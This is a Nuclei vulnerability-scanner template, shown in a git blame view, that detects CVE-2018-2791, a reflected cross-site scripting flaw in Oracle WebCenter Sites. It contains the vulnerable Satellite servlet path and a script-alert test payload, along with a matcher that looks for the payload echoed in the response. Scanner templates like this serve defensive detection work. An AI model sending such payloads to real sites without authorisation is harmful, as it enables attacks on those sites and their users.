nuclei-templates/cves/CVE-2018-2791.yaml

17 lines
491 B
YAML
Raw Normal View History

id: cve-2018-2791
2020-04-08 11:37:09 +00:00
info:
name: Oracle WebCenter Sites XSS
2020-04-08 11:43:51 +00:00
author: madrobot
severity: medium
2020-08-25 22:22:08 +00:00
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
2020-04-08 11:37:09 +00:00
requests:
- method: GET
path:
2020-08-26 07:34:18 +00:00
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
2020-04-08 11:37:09 +00:00
matchers:
- type: word
words:
2020-08-26 07:31:07 +00:00
- "<h1xxx<scriptalert(1)</script"
2020-04-08 11:37:09 +00:00
part: body